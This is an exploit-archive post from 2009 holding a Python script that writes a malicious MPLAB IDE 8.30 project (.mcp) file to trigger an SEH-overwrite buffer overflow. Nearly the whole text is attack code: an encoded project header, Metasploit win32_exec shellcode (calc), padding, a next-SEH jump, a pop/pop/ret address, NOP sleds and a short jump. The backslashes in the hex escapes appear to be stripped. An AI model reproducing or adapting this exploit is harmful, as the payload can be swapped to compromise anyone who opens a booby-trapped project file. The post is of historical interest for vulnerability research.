mplabide-overwrite.txt
Posted on 12 May 2009
# usage: mplab.py then open the project file :) # Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p) print "**************************************************************************" print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit " print " Refer : Secunia advisory (35054) " print " Exploit code: His0k4 " print " Tested on: Windows XP Pro SP3 (EN) " print " Greetings to:" print " All friends & muslims HaCkers(dz),snakespc.com " print "**************************************************************************" header1 = ( "x5bx48x45x41x44x45x52x5dx0dx0ax6dx61x67x69x63x5f" "x63x6fx6fx6bx69x65x3dx7bx36x36x45x39x39x42x30x37" "x2dx45x37x30x36x2dx34x36x38x39x2dx39x45x38x30x2d" "x39x42x32x35x38x32x38x39x38x41x31x33x7dx0dx0ax66" "x69x6cx65x5fx76x65x72x73x69x6fx6ex3dx31x2ex30x0d" "x0ax5bx50x41x54x48x5fx49x4ex46x4fx5dx0dx0ax64x69" "x72x5fx73x72x63x3dx0dx0ax64x69x72x5fx62x69x6ex3d" "x0dx0ax64x69x72x5fx74x6dx70x3dx0dx0ax64x69x72x5f" "x73x69x6ex3dx0dx0ax64x69x72x5fx69x6ex63x3dx0dx0a" "x64x69x72x5fx6cx69x62x3dx0dx0ax64x69x72x5fx6cx6b" "x72x3dx0dx0ax5bx43x41x54x5fx46x49x4cx54x45x52x53" "x5dx0dx0ax66x69x6cx74x65x72x5fx73x72x63x3dx2ax2e" "x61x73x6dx0dx0ax66x69x6cx74x65x72x5fx69x6ex63x3d" "x2ax2ex68x3bx2ax2ex69x6ex63x0dx0ax66x69x6cx74x65" "x72x5fx6fx62x6ax3dx2ax2ex6fx0dx0ax66x69x6cx74x65" "x72x5fx6cx69x62x3dx2ax2ex6cx69x62x0dx0ax66x69x6c" "x74x65x72x5fx6cx6bx72x3dx2ax2ex6cx6bx72x0dx0ax5b" "x53x55x49x54x45x5fx49x4ex46x4fx5dx0dx0ax73x75x69" "x74x65x5fx67x75x69x64x3dx7bx36x42x33x44x41x41x37" "x38x2dx35x39x43x31x2dx34x36x44x44x2dx42x36x41x41" "x2dx44x42x44x41x45x34x45x30x36x34x38x34x7dx0dx0a" "x73x75x69x74x65x5fx73x74x61x74x65x3dx0dx0ax5bx54" "x4fx4fx4cx5fx53x45x54x54x49x4ex47x53x5dx0dx0ax54" "x53x7bx42x46x44x32x37x46x42x41x2dx34x41x30x32x2d" "x34x43x30x45x2dx41x35x45x35x2dx42x38x31x32x46x33" "x45x37x37x30x37x43x7dx3dx2fx6fx22") header2 = ( "x2ex63x6fx66x22x0dx0ax54x53x7bx41x44x45x39x33x41" "x35x35x2dx43x37x43x37x2dx34x44x34x44x2dx41x34x42" "x41x2dx35x39x33x30x35x46x37x44x30x33x39x31x7dx3d" "x0dx0a") # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x79" "x1fx8cx11x83xebxfcxe2xf4x85xf7xc8x11x79x1fx07x54" "x45x94xf0x14x01x1ex63x9ax36x07x07x4ex59x1ex67x58" "xf2x2bx07x10x97x2ex4cx88xd5x9bx4cx65x7exdex46x1c" "x78xddx67xe5x42x4bxa8x15x0cxfax07x4ex5dx1ex67x77" "xf2x13xc7x9ax26x03x8dxfaxf2x03x07x10x92x96xd0x35" "x7dxdcxbdxd1x1dx94xccx21xfcxdfxf4x1dxf2x5fx80x9a" "x09x03x21x9ax11x17x67x18xf2x9fx3cx11x79x1fx07x79" "x45x40xbdxe7x19x49x05xe9xfaxdfxf7x41x11xefx06x15" "x26x77x14xefxf3x11xdbxeex9ex7cxedx7dx1ax1fx8cx11") buff = "x41" * (226-len(shellcode)) next_seh = "x74xc9x41x42" seh = "x12x13x40x00" #p/p/r MPLAB.exe nops1 = "x90"*20 nops2 = "x90"*28 mshellcode = "xE9x47xFFxFFxFF" #welli 3liya :p exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2 try: out_file = open("exploit.mcp",'w') out_file.write(exploit) out_file.close() raw_input(" Exploit file created! ") except: print "Error"
